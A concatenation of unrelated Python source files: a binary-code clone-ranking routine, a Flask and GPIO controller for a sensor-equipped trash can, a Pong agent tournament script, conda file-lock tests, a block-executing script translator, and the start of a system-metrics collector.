gain[p2] = gain.get(p2, 0) + stringsLeft[stri]['score']
if not p2 in stringsPerPkg:
stringsPerPkg[p2] = []
stringsPerPkg[p2].append(stri)
newstrleft.add(stringsLeft[stri]['string'])
for i in oldstrleft.difference(newstrleft):
if linecount[i] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[i] -= 1
for p2 in gain.keys():
## check if packages could ever contribute usefully.
if gain[p2] < gaincutoff:
useless_packages.add(p2)
## gain_sorted contains the sort order, gain contains the actual data
gain_sorted = sorted(gain, key = lambda x: gain.__getitem__(x), reverse=True)
if gain_sorted == []:
break
## 'best' is currently the top candidate, but that may still change below
best = gain_sorted[0]
## Possible optimisation: skip the last step if the gain is not high enough
if filter(lambda x: x[1] > gaincutoff, gain.items()) == []:
break
## if multiple packages have a big enough gain, add them to 'close'
## and 'fight' to see which package is the most likely hit.
close = filter(lambda x: gain[x] > (gain[best] * 0.9), gain_sorted)
## Let's hope "sort" terminates on a comparison function that
## may not actually be a proper ordering.
if len(close) > 1:
#if scandebug:
# print >>sys.stderr, " doing battle royale between", close
## reverse sort close, then best = close_sorted[0][0]
for c in close:
if avgscores[language].get(c) is None:
avgscores[language][c] = 0
close_sorted = map(lambda x: (x, avgscores[language][x]), close)
close_sorted = sorted(close_sorted, key = lambda x: x[1], reverse=True)
## If we don't have a unique score *at all* it is likely that everything
## is cloned. There could be a few reasons:
## 1. there are duplicates in the database due to renaming
## 2. package A is completely contained in package B (bundling).
## If there are no hits for package B, it is more likely we are
## actually seeing package A.
if uniqueScore == {}:
best = close_sorted[-1][0]
else:
best = close_sorted[0][0]
#if scandebug:
# print >>sys.stderr, " %s won" % best
best_score = 0
## for each string in the package with the best gain add the score
## to the package and move on to the next package.
todelete = set()
for xy in stringsPerPkg[best]:
x = stringsLeft[xy]
strsplit = xy.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
## is this correct here? There are situations where one
## string appears multiple times in a single source file
## and also in the binary (eapol_sm.c in hostapd 0.3.9 contains
## the string "%s state=%s" several times, and binaries
## built from it do too).
todelete.add(strsplit)
continue
sameFileScore[best] = sameFileScore.get(best, 0) + x['score']
best_score += 1
linecount[strsplit] = linecount[strsplit] - 1
if best in nonUniqueMatches:
nonUniqueMatches[best].append(strsplit)
else:
nonUniqueMatches[best] = [strsplit]
for a in todelete:
for st in string_split[a]:
del stringsLeft[st]
## store how many non unique strings were assigned per package
nonUniqueAssignments[best] = nonUniqueAssignments.get(best,0) + best_score
if gain[best] < gaincutoff:
break
strleft = len(stringsLeft)
for i in stringsLeft:
strsplit = i.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[strsplit] -= 1
scores = {}
for k in set(uniqueScore.keys() + sameFileScore.keys()):
scores[k] = uniqueScore.get(k, 0) + sameFileScore.get(k, 0) + nonUniqueScore.get(k,0) + directAssignedScore.get(k,0)
scores_sorted = sorted(scores, key = lambda x: scores.__getitem__(x), reverse=True)
rank = 1
reports = []
if scores == {}:
totalscore = 0.0
else:
totalscore = float(reduce(lambda x, y: x + y, scores.values()))
for s in scores_sorted:
try:
percentage = (scores[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatches.get(s,[]), 'uniquematcheslen': len(uniqueMatches.get(s,[])), 'percentage': percentage, 'packageversions': packageversions.get(s, {}), 'packagelicenses': packagelicenses.get(s, []), 'packagecopyrights': packagecopyrights.get(s,[])})
rank = rank+1
if matchedlines == 0 and unmatched == []:
res = None
else:
if scankernelfunctions:
matchedlines = matchedlines - len(kernelfuncres)
lenlines = lenlines - len(kernelfuncres)
ignored = list(set(ignored))
ignored.sort()
res = {'matchedlines': matchedlines, 'extractedlines': lenlines, 'reports': reports, 'nonUniqueMatches': nonUniqueMatches, 'nonUniqueAssignments': nonUniqueAssignments, 'unmatched': unmatched, 'scores': scores, 'unmatchedlines': unmatchedlines, 'matchednonassignedlines': matchednonassignedlines, 'matchednotclonelines': matchednotclonelines, 'matcheddirectassignedlines': matcheddirectassignedlines, 'ignored': list(set(ignored))}
else:
res = None
## then look up results for function names, variable names, and so on.
if language == 'C':
if linuxkernel:
functionRes = {}
if 'BAT_KERNELSYMBOL_SCAN' in scanenv:
namekernelquery = "select distinct package from linuxkernelnamecache where varname=%s"
variablepvs = scankernelsymbols(leafreports['identifier']['kernelsymbols'], scanenv, namekernelquery, cursor, conn, clones)
## TODO: clean up
if leafreports['identifier'].has_key('kernelfunctions'):
if leafreports['identifier']['kernelfunctions'] != []:
functionRes['kernelfunctions'] = copy.deepcopy(leafreports['identifier']['kernelfunctions'])
else:
(functionRes, variablepvs) = scanDynamic(leafreports['identifier']['functionnames'], leafreports['identifier']['variablenames'], scanenv, cursor, conn, clones)
elif language == 'Java':
if not ('BAT_CLASSNAME_SCAN' in scanenv or 'BAT_FIELDNAME_SCAN' in scanenv or 'BAT_METHOD_SCAN' in scanenv):
variablepvs = {}
functionRes = {}
else:
(functionRes, variablepvs) = extractJava(leafreports['identifier'], scanenv, cursor, conn, clones)
else:
variablepvs = {}
functionRes = {}
## then write results back to disk. This needs to be done because results for
## Java might need to be aggregated first.
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'].append('ranking')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
cPickle.dump(leafreports, leaf_file)
leaf_file.close()
reportqueue.put(filehash)
scanqueue.task_done()
def licensesetup(scanenv, cursor, conn, debug=False):
if cursor == None:
return (False, {})
cursor.execute("select table_name from information_schema.tables where table_type='BASE TABLE' and table_schema='public'")
tablenames = map(lambda x: x[0], cursor.fetchall())
conn.commit()
## Now verify the names of the tables
newenv = copy.deepcopy(scanenv)
supported_languages = set()
## for Java
if 'stringscache_java' in tablenames:
supported_languages.add('Java')
else:
if 'Java' in supported_languages:
supported_languages.remove('Java')
if 'Java' in supported_languages:
if 'classcache_java' in tablenames:
newenv['BAT_CLASSNAME_SCAN'] = 1
else:
if 'BAT_CLASSNAME_SCAN' in newenv:
del newenv['BAT_CLASSNAME_SCAN']
if 'fieldcache_java' in tablenames:
newenv['BAT_FIELDNAME_SCAN'] = 1
else:
if 'BAT_FIELDNAME_SCAN' in newenv:
del newenv['BAT_FIELDNAME_SCAN']
if 'functionnamecache_java' in tablenames:
newenv['BAT_METHOD_SCAN'] = 1
else:
if 'BAT_METHOD_SCAN' in newenv:
del newenv['BAT_METHOD_SCAN']
## for C
if 'stringscache_c' in tablenames:
supported_languages.add('C')
else:
if 'C' in supported_languages:
			supported_languages.discard('C')
if 'C' in supported_languages:
if 'varnamecache_c' in tablenames:
newenv['BAT_VARNAME_SCAN'] = 1
if 'functionnamecache_c' in tablenames:
newenv['BAT_FUNCTION_SCAN'] = 1
## for Linux kernel
if 'linuxkernelnamecache' in tablenames:
newenv['BAT_KERNELSYMBOL_SCAN'] = 1
if 'linuxkernelfunctionnamecache' in tablenames:
newenv['BAT_KERNELFUNCTION_SCAN'] = 1
if 'renames' in tablenames:
newenv['HAVE_CLONE_DB'] = 1
supported_languages = list(supported_languages)
newenv['supported_languages'] = supported_languages
return (True, newenv)
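## Illustrative sketch only (not part of the original scanner): one way a caller
## could consume the (status, newenv) pair returned by licensesetup(). The
## scanenv/cursor/conn arguments are whatever the scan framework already passes in.
def example_licensesetup_usage(scanenv, cursor, conn):
	(ok, newenv) = licensesetup(scanenv, cursor, conn)
	if not ok:
		## no usable database connection, fall back to the unmodified environment
		return scanenv
	## only languages whose caches exist end up in 'supported_languages'
	return newenv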
|
app.py
|
import sqlite3
import json
import datetime
import logging
import requests
import uuid
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread
from flask_apscheduler import APScheduler
from flask import Flask, request, g, Response
from flask_restful import Resource, Api
from gpiozero import Button, OutputDevice
from hx711 import HX711
import config
import bc_scanner
import sch
# Setup scale amp
hx711 = HX711(
dout_pin=config.conf['SCALE_DATA_PIN'],
pd_sck_pin=config.conf['SCALE_CLOCK_PIN'],
channel=config.conf['SCALE_CHANNEL'],
gain=config.conf['SCALE_GAIN']
)
#Create objects for physical objects
lid_switch = Button(config.conf['LID_SWITCH_PIN'])
lid_open_button = OutputDevice(config.conf['LID_OPEN_PIN'], active_high=False, initial_value=False)
lid_close_button = OutputDevice(config.conf['LID_CLOSE_PIN'], active_high=False, initial_value=False)
light = OutputDevice(config.conf['LIGHT_PIN'], active_high=False, initial_value=False)
fan = OutputDevice(config.conf['FAN_PIN'], active_high=False, initial_value=False)
led = OutputDevice(config.conf['LED_PIN'], active_high=False, initial_value=False)
#Setup parser
#Setup database
DATABASE = '/srv/trashcan/venv/database/database.db'
# Shared app context
app = Flask(__name__)
scheduler = APScheduler()
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
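# Sketch of how the per-request connection above is meant to be used inside a
# handler (illustrative only; the table name here is hypothetical):
#   cur = get_db().cursor()
#   cur.execute("SELECT * FROM Example")
#   rows = cur.fetchall()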
def update_status():
payload = {
'lid' : lid_switch.value,
'light' : light.value,
'fan' : fan.value,
'led' : led.value
}
try:
requests.post(config.conf['HOME_SERVER_URL'] + '/update_status', params = payload, timeout=0.2)
    except requests.exceptions.RequestException as e:
        logging.warning('Update status failed: %s', e)
def start_api():
# Config API
my_api = Api(app)
my_api.add_resource(Index, '/')
my_api.add_resource(ApiRoot, '/api')
my_api.add_resource(Lid, '/api/lid')
my_api.add_resource(Scale, '/api/scale')
my_api.add_resource(Light, '/api/light')
my_api.add_resource(Fan, '/api/fan')
my_api.add_resource(BarcodeList, '/api/barcode')
my_api.add_resource(WeightList, '/api/weight')
my_api.add_resource(Barcode, '/api/barcode/<barcode_id>')
my_api.add_resource(Weight, '/api/weight/<weight_id>')
    my_api.add_resource(ConfigList, '/api/config')
    my_api.add_resource(ConfigItem, '/api/config/<option_name>')
# Config scheduler
app.config.from_object(sch.Config())
scheduler.init_app(app)
scheduler.start()
app.run()
# Watchdog to monitor db config table for changes
def start_change_monitor():
change_id = config.get_last_change_id()
while True:
new_conf_id = config.get_last_change_id()
if new_conf_id > change_id:
config.load_config()
change_id = new_conf_id
# Restart scheduler with new values
scheduler.shutdown()
scheduler.start()
        sleep(config.conf['WATCHDOG_SLEEP_TIMER'])
# Pauses any jobs for lights and/or fan and starts up barcode scanner
def start_lid_monitor():
state = False
while True:
#If lid is open, pause job processing, start the scanner and read
while lid_switch.value:
if not state:
state = True
logging.debug('Lid open')
update_status()
scheduler.pause()
upc = bc_scanner.read()
#Uploads return from read if not empty
if upc:
bc_scanner.upload(upc)
sleep(0.1)
#If lid was just closed, resume processing jobs, stop scanner, and upload a scale reading
if state:
state = False
logging.debug('Lid closed')
update_status()
scheduler.resume()
#Get weight from scale
            r = requests.get('http://127.0.0.1/api/scale')
            requests.post('http://127.0.0.1/api/weight/' + str(uuid.uuid1()) + '?weight_raw=' + r.text)
sleep(0.1)
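# Hedged alternative sketch (not wired in): gpiozero Button objects also expose
# when_pressed/when_released callbacks, so the lid could be handled without a
# polling loop. Which callback corresponds to "open" depends on how the switch
# is wired; the handler names below are illustrative only.
def _install_lid_callbacks():
    def _on_lid_opened():
        logging.debug('Lid open')
        update_status()
        scheduler.pause()
    def _on_lid_closed():
        logging.debug('Lid closed')
        update_status()
        scheduler.resume()
    lid_switch.when_pressed = _on_lid_opened
    lid_switch.when_released = _on_lid_closed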
def toggle_led(action=None):
if config.conf['CLEANING_LED'] == 'true':
if action == 'off':
led.off()
elif action == 'on':
led.on()
else:
led.toggle()
update_status()
class Index (Resource):
def get(self):
content = "<h1>This is an index page</h1>"
return content
class ApiRoot(Resource):
def get(self):
content = "<h1>This is an API page</h1>"
return content
class Lid(Resource):
def get(self):
return lid_switch.value
def put(self):
action = request.args.get('action')
if action == 'close':
lid_close_button.on()
logging.info('Lid closed')
elif action == 'open':
lid_open_button.on()
logging.info('Lid opened')
elif action == 'toggle':
if lid_switch.value:
lid_close_button.on()
logging.info('Lid closed')
else:
lid_open_button.on()
logging.info('Lid opened')
else:
return Response('Invalid action parameter',status=400)
update_status()
return 'Success'
class Light(Resource):
def get(self):
return light.value
def put(self):
action = request.args.get('action')
if action == 'off':
light.off()
toggle_led('off')
elif action == 'on':
light.on()
toggle_led('on')
elif action == 'toggle':
light.toggle()
toggle_led()
else:
return Response('Invalid action parameter',status=400)
update_status()
return 'Success'
class Fan(Resource):
def get(self):
return fan.value
def put(self):
action = request.args.get('action')
if action == 'off':
fan.off()
toggle_led('off')
elif action == 'on':
fan.on()
toggle_led('on')
elif action == 'toggle':
fan.toggle()
toggle_led()
else:
            return Response('Invalid action parameter', status=400)
update_status()
return 'Success'
class Scale (Resource):
def get(self):
GPIO.setwarnings(False)
offset = 30500
gain = 0.0095
hx711.reset() #Maybe not necessary
raw_measures = hx711.get_raw_data(config.conf['NUM_MEASUREMENTS'])
#Apply offset
measures = [x + offset for x in raw_measures]
measures.sort()
#Calculate median
median = measures[int(round((len(measures) / 2)))]
#Remove values outside +/- 25% from the median
results = [x for x in measures if median * 0.75 <= x <= median * 1.25]
#0 out and average values. Should be ~1000 after applying offset. Remove this before applying gain.
x = (sum(results)/len(results))- 1000
#Apply gain and remove tare value.
return (x*gain) - config.conf['TARE']
def put(self):
hx711.reset() # Maybe not necessary
config.set_config('TARE', hx711.get_raw_data(config.conf['NUM_MEASUREMENTS']))
return 'Success'
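# Standalone sketch of the filtering done in Scale.get above, so the arithmetic
# can be checked without the HX711 hardware. The default offset/gain values are
# illustrative, not calibration constants.
def _filter_scale_samples(raw_measures, offset=30500, gain=0.0095, tare=0.0):
    measures = sorted(x + offset for x in raw_measures)
    median = measures[len(measures) // 2]
    # Keep only samples within +/- 25% of the median, then centre around ~1000.
    kept = [x for x in measures if median * 0.75 <= x <= median * 1.25]
    centred = (sum(kept) / len(kept)) - 1000
    return centred * gain - tare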
class WeightList (Resource):
def get(self):
        conn = get_db()
        cur = conn.cursor()
        cur.execute("SELECT * FROM [Weight]")
        results = cur.fetchall()
        return json.dumps(results)
def delete(self):
return 501
class BarcodeList (Resource):
def get(self):
        conn = get_db()
        cur = conn.cursor()
        cur.execute("SELECT * FROM [Barcode]")
        results = cur.fetchall()
        return json.dumps(results)
def delete(self):
return 501
class Barcode (Resource):
def post(self,barcode_id):
conn = get_db()
time = datetime.datetime.now()
barcode = request.args.get('barcode')
conn.cursor().execute("INSERT INTO Barcode ([barcode_id],[timestamp],[barcode]) VALUES(?, ?, ?)",(barcode_id,time,barcode,))
conn.commit()
return barcode_id
    def delete(self, barcode_id):
        conn = get_db()
        cur = conn.cursor()
        cur.execute("DELETE FROM [Barcode] WHERE barcode_id = ?", (barcode_id,))
        conn.commit()
        return cur.rowcount
    def get(self, barcode_id):
        conn = get_db()
        cur = conn.cursor()
        cur.execute("SELECT * FROM [Barcode] WHERE barcode_id = ? LIMIT 1", (barcode_id,))
        return json.dumps(cur.fetchone())
class Weight (Resource):
def post(self,weight_id):
conn = get_db()
time = datetime.datetime.now()
        weight_raw = float(request.args.get('weight_raw'))
        if request.args.get('weight'):
            weight = float(request.args.get('weight'))
        else:
            weight = weight_raw * config.conf['CONVERSION_FACTOR']
conn.cursor().execute("INSERT INTO Weight ([weight_id],[timestamp],[weight],[weight_raw]) VALUES(?, ?, ?,?)",
(weight_id,time,weight,weight_raw))
conn.commit()
return weight_id
    def delete(self, weight_id):
        conn = get_db()
        cur = conn.cursor()
        cur.execute("DELETE FROM [Weight] WHERE weight_id = ?", (weight_id,))
        conn.commit()
        return cur.rowcount
    def get(self, weight_id):
        conn = get_db()
        cur = conn.cursor()
        cur.execute("SELECT * FROM [Weight] WHERE weight_id = ? LIMIT 1", (weight_id,))
        return json.dumps(cur.fetchone())
class ConfigList (Resource):
def get(self):
return config.get_config()
class ConfigItem (Resource):
def get(self, option_name):
return config.get_config(option_name)
def put(self, option_name):
value = request.args.get('value')
config.set_config(option_name, value)
def post(self, option_name):
value = request.args.get('value')
config.set_config(option_name, value)
def delete(self, option_name):
config.delete_config(option_name)
if __name__ == '__main__':
    t1 = Thread(target=start_api)
    t2 = Thread(target=start_change_monitor)
    t3 = Thread(target=start_lid_monitor)
t1.start()
t2.start()
t3.start()
|
epic_battle_royale.py
|
import argparse
import sys
import os
from pong_testbench import PongTestbench
from multiprocessing import Process, Queue
from matplotlib import font_manager
from time import sleep
import importlib
import numpy as np
parser = argparse.ArgumentParser()
parser.add_argument("dir", type=str, help="Directory with agents.")
parser.add_argument("--render", "-r", action="store_true", help="Render the competition.")
parser.add_argument("--games", "-g", type=int, default=100, help="Number of games.")
parser.add_argument("--max_proc", "-p", type=int, default=4, help="Max number of processes.")
args = parser.parse_args()
def run_test(id1, agent1_dir, id2, agent2_dir, queue, games, render):
sys.path.insert(0, agent1_dir)
orig_wd = os.getcwd()
import agent
os.chdir(agent1_dir)
agent1 = agent.Agent()
agent1.load_model()
os.chdir(orig_wd)
del sys.path[0]
sys.path.insert(0, agent2_dir)
importlib.reload(agent)
os.chdir(agent2_dir)
agent2 = agent.Agent()
agent2.load_model()
os.chdir(orig_wd)
del sys.path[0]
testbench = PongTestbench(render)
testbench.init_players(agent1, agent2)
testbench.run_test(games)
wins1, games = testbench.get_agent_score(agent1)
wins2, games = testbench.get_agent_score(agent2)
name1 = agent1.get_name()
name2 = agent2.get_name()
queue.put((id1, id2, wins1, wins2, name1, name2, games))
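# Minimal sketch of the module-swap trick used in run_test above: the same
# module name ("agent") is resolved against different directories by prepending
# each directory to sys.path and reloading. The helper name is illustrative.
def _load_agent_class(agent_dir):
    sys.path.insert(0, agent_dir)
    try:
        import agent
        agent = importlib.reload(agent)
        return agent.Agent
    finally:
        del sys.path[0]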
def get_directories(top_dir):
subdir_list = []
subdir_gen = os.walk(top_dir)
for dir, subdirs, files in subdir_gen:
if "__pycache__" in dir:
continue
if "agent.py" not in files:
print("Warn: No agent.py found in %s. Skipping." % dir)
continue
subdir_list.append(dir)
print("%s added to directory list." % dir)
return subdir_list
def epic_battle_royale(top_dir, max_proc=4):
directories = get_directories(top_dir)
names = ["__unknown__"] * len(directories)
procs = []
result_queue = Queue()
print("Finished scanning for agents; found:", len(directories))
for i1, d1 in enumerate(directories):
for i2, d2 in enumerate(directories):
if i1 == i2:
continue
pargs = (i1, d1, i2, d2, result_queue, args.games, args.render)
proc = Process(target=run_test, args=pargs)
procs.append(proc)
print("Living procs:", sum(p.is_alive() for p in procs))
while sum(p.is_alive() for p in procs) >= max_proc:
sleep(0.3)
print("Starting process")
proc.start()
sleep(1)
for p in procs:
p.join()
# Fetch all results from the queue
no_agents = len(directories)
games_won = np.zeros((no_agents, no_agents), dtype=np.int32)
while result_queue.qsize() > 0:
id1, id2, wins1, wins2, name1, name2, games = result_queue.get()
if wins1 + wins2 != games:
print("Woops, wins dont sum up.")
games_won[id1, id2] += wins1
games_won[id2, id1] += wins2
names[id1] = name1
names[id2] = name2
np.save("brres", games_won)
# Format: Wins of ROW versus COLUMN
np.savetxt("battle_royale_results.txt", games_won, fmt="%d")
np.savetxt("battle_royale_players.txt", directories, fmt="%s")
# Sum across columns to get total wins of each agent
total_wins = games_won.sum(axis=1)
# And across rows to get total losses.
total_losses = games_won.sum(axis=0)
agent_wins = list(zip(total_wins, total_losses, names, directories))
agent_wins.sort(key=lambda x: -x[0])
resfile = open("leaderboard.txt", "w")
print("")
print("-"*80)
print("--- LEADERBOARD ---")
for i, (wins, losses, name, dir) in enumerate(agent_wins):
line = "%d. %s with %d wins (winrate %.2f%%) (from %s)" % (i+1, name, wins, wins/(wins+losses)*100, dir)
resfile.write(line+"\n")
print(line)
resfile.close()
print("-"*80)
print("")
print("Finished!")
if __name__ == "__main__":
epic_battle_royale(args.dir, args.max_proc)
|
test_lock.py
|
import pytest
from conda.lock import DirectoryLock, FileLock, LockError
from os.path import basename, exists, isfile, join
def test_filelock_passes(tmpdir):
"""
Normal test on file lock
"""
package_name = "conda_file1"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock:
path = basename(lock.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_filelock_locks(tmpdir):
"""
    Test file lock with multiple locks on the same file.
    A LockError should be raised.
"""
package_name = "conda_file_2"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists()
with pytest.raises(LockError) as execinfo:
with FileLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert lock2.path_to_lock == lock1.path_to_lock
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_folder_locks(tmpdir):
"""
Test on Directory lock
"""
package_name = "dir_1"
tmpfile = join(tmpdir.strpath, package_name)
with DirectoryLock(tmpfile) as lock1:
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
with pytest.raises(LockError) as execinfo:
with DirectoryLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
# lock should clean up after itself
assert not exists(lock1.lock_file_path)
def test_lock_thread(tmpdir):
"""
    Two threads want to lock the same file.
    One thread will have a LockError raised.
"""
def lock_thread(tmpdir, file_path):
with FileLock(file_path) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
assert not tmpdir.join(path).exists()
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_lock_retries(tmpdir):
"""
    Two threads want to lock the same file.
    The lock has zero retries.
    One thread will have a LockError raised.
"""
def lock_thread_retries(tmpdir, file_path):
with pytest.raises(LockError) as execinfo:
with FileLock(file_path, retries=0):
                assert False  # should never enter here, since retries is 0
assert "LOCKERROR" in str(execinfo.value)
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread_retries, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_permission_file():
"""
    Test when the lock cannot be created due to permissions.
    Make sure no exception is raised.
"""
from conda._vendor.auxlib.compat import Utf8NamedTemporaryFile
from conda.common.compat import text_type
with Utf8NamedTemporaryFile(mode='r') as f:
if not isinstance(f.name, text_type):
return
with FileLock(f.name) as lock:
path = basename(lock.lock_file_path)
assert not exists(join(f.name, path))
|
translator.py
|
import re
import threading
def parse_text(session, args):
print(threading.current_thread(), 'parse_text')
print(threading.enumerate(), 'parse_text')
bytes_list = args[0].split(',')
bytes_array = bytearray([int(i) for i in bytes_list]).decode()
sentences = bytes_array.split('\n')
var_dict = dict()
executable_file = ''
for i in range(3):
        try:
            result_apis = re.findall(r"^(.*) += *(.*)\('(.*)'\)", sentences[i])[0]
        except IndexError:
            break
if result_apis[1] == 'GetModel3D':
model_name = [result_apis[0], result_apis[2]]
elif result_apis[1] == 'GetSimulation':
simulation_name = [result_apis[0], result_apis[2]]
in_block=False
blocks = list()
session.blocks = blocks
for i in range(3,len(sentences)):
sentence = sentences[i]
server_result = re.findall("(\t*)(.*) \((.*)\) {}".format('{'), sentence)
if len(server_result)>0:
in_block = True
sentences_block = ''
current_args = ''
current_sep = server_result[0][0]
if server_result[0][1]==model_name[0]:
current_block = Block('model3D', model_name[1], session, blocks)
elif server_result[0][1]==simulation_name[0]:
current_block = Block('CFD', simulation_name[1],session, blocks)
if len(server_result[0][2].split(','))>0:
current_args = server_result[0][2]
current_block.set_args(current_args)
current_block.return_string = ''
current_block.return_values = ''
continue
if re.search(".*}.*", sentence):
in_block=False
current_block.set_string(sentences_block)
blocks.append(current_block)
index = blocks.index(current_block)
executable_file += current_sep + current_block.return_string + "blocks[{}]({})\n".format(index, current_args)
continue
elif re.search('.*return \((.*)\)',sentence):
current_block.return_values = re.findall('.*return \((.*)\)', sentence)[0]
current_block.return_string = re.findall('.*return \((.*)\)', sentence)[0]+"," + " = "
continue
if in_block:
sentences_block += sentence+'\n'
continue
executable_file += sentence + "\n"
print(threading.enumerate(), '...-.-.-.-.-..-.-.-.-.-...-.-')
t = threading.Thread(target=run_exec, name='Execute',args=(executable_file,blocks))
t.start()
def run_exec(executable_file, blocks):
blocks = blocks
print('____________________________-')
print(executable_file)
print('----------------------------')
print(threading.enumerate(), 'before compile')
exec(compile(executable_file, '<string>', 'exec'))
print(threading.enumerate(), 'after compile')
class Block(object):
def __init__(self, server, API, session, blocks_list):
self.server = server
self.API = API
self.session = session
self.blocks_list = blocks_list
def set_string(self, string):
self.block_string = string
def set_args(self, args):
self.args = args
def __call__(self, *args):
self.run_thread(*args)
self.flag = True
while self.flag:
import time
time.sleep(5)
print('Waiting',self.blocks_list.index(self))
print(self.flag)
pass
return self.return_values
def run_thread(self, *args):
var_dict = dict()
index = self.blocks_list.index(self)
if len(args)>0:
args_name = self.args.split(',')
for i in range(len(args_name)):
if isinstance(args[i], str):
var_dict['{}'.format(args_name[i])] = "'" + args[i] + "'"
else:
var_dict['{}'.format(args_name[i])] = args[i]
var_dict['return_values'] = self.return_values
var_dict['index'] = index
var_dict['receiver'] = 'handler'
self.session.__getattribute__('socket_{}'.format(self.server)).send('superEditor', {
'execute_block': [self.block_string, var_dict]})
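# Hedged alternative sketch (not wired into Block above): the busy-wait loop in
# __call__ could be replaced with a threading.Event that the response handler
# sets once the result arrives. Names below are illustrative only.
class _EventWaiter(object):
    def __init__(self):
        self._done = threading.Event()
        self.return_values = None
    def wait_for_result(self, timeout=None):
        # Blocks without polling; returns whatever was delivered (or None).
        self._done.wait(timeout)
        return self.return_values
    def deliver(self, values):
        self.return_values = values
        self._done.set()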
def response_blocks(session, args):
session.blocks[args[0]].return_values = args[1::]
session.blocks[args[0]].flag = False
class Model3DVar(object):
def __init__(self, session, API):
self.session = session
self.API = API
class SimulationVar(object):
def __init__(self, session, API):
self.session = session
self.API = API
|
capture_from_local-s11_4.py
|
#!/usr/bin/python
import os
import sys
import time
import json
import string
import socket
import subprocess
import multiprocessing
from multiprocessing import Process
import psutil as ps
from pprint import pprint
from libsstore import SStore
from urlparse import urlparse
from functools import partial
from urllib2 import Request, urlopen, URLError
hostname = socket.gethostname()
def qryTime():
start_time = int(time.time())
subprocess.call(['/opt/sys_monitor/conf/test_db1_apps.sh', hostname], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
time.sleep(5)
end_time = int(time.time())
date_time = end_time
db1_qry = end_time - start_time
if db1_qry < 3:
time.sleep(60)
statsData = {"db1.qry-time": db1_qry}
#print statsData
updateSstore(statsData)
def statTime():
disks1 = ps.disk_io_counters(perdisk=True)
dsk1_0b = disks1["sd1"]
dsk1_0c = disks1["sd3"]
net1 = ps.net_io_counters(pernic=True)
net1_all = net1["net0"]
time.sleep(2)
date_time = int(time.time())
cpu = ps.cpu_times_percent()
mem = ps.virtual_memory()
swap = ps.swap_memory()
disks2 = ps.disk_io_counters(perdisk=True)
net2 = ps.net_io_counters(pernic=True)
cpu_usr = int(round(cpu[0],3))
cpu_sys = int(round(cpu[1],3))
cpu_tot = int(round(cpu[0] + cpu[1],3))
# Conversion below - (0, 'B'), (10, 'KB'),(20, 'MB'),(30, 'GB'),(40, 'TB'), (50, 'PB')
mem_usd = int(round(mem[3] / 2 ** 20))
mem_tot = int(round(mem[0] / 2 ** 20))
swp_usd = int(round(swap[1] / 2 ** 20))
swp_tot = int(round(swap[0] / 2 ** 20))
dsk2_0b = disks2["sd1"]
dsk2_0c = disks2["sd3"]
dsk_0b_rop = (dsk2_0b[0] - dsk1_0b[0])
dsk_0b_wop = (dsk2_0b[1] - dsk1_0b[1])
dsk_0b_rmb = (dsk2_0b[2] - dsk1_0b[2]) / 1024 / 1024
dsk_0b_wmb = (dsk2_0b[3] - dsk1_0b[3]) / 1024 / 1024
dsk_0b_rtm = (dsk2_0b[4] - dsk1_0b[4])
dsk_0b_wtm = (dsk2_0b[5] - dsk1_0b[5])
dsk_0c_rop = (dsk2_0c[0] - dsk1_0c[0])
dsk_0c_wop = (dsk2_0c[1] - dsk1_0c[1])
dsk_0c_rmb = (dsk2_0c[2] - dsk1_0c[2]) / 1024 / 1024
dsk_0c_wmb = (dsk2_0c[3] - dsk1_0c[3]) / 1024 / 1024
dsk_0c_rtm = (dsk2_0c[4] - dsk1_0c[4])
dsk_0c_wtm = (dsk2_0c[5] - dsk1_0c[5])
    net2_all = net2["net0"]
net_smb = (net2_all[0] - net1_all[0]) / 1024 / 1024 / 2
net_rmb = (net2_all[1] - net1_all[1]) / 1024 / 1024 / 2
ses_c = subprocess.Popen(['/opt/sys_monitor/conf/chk_db1_apps-ses.sh', hostname], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
stdout = ses_c.communicate()[0]
db1_ses = filter(type(stdout).isdigit, stdout)
statsData = {
"date_time": date_time,
"cpu.usage-sys": cpu_sys,
"cpu.usage-usr": cpu_usr,
"cpu.usage-total": cpu_tot,
"memory-used": mem_usd,
"memory-total": mem_tot,
"swap-used": swp_usd,
"swap-total": swp_tot,
"net.in-megabytes": net_rmb,
"net.out-megabytes": net_smb,
"disk.read-megabytes-0B": dsk_0b_rmb,
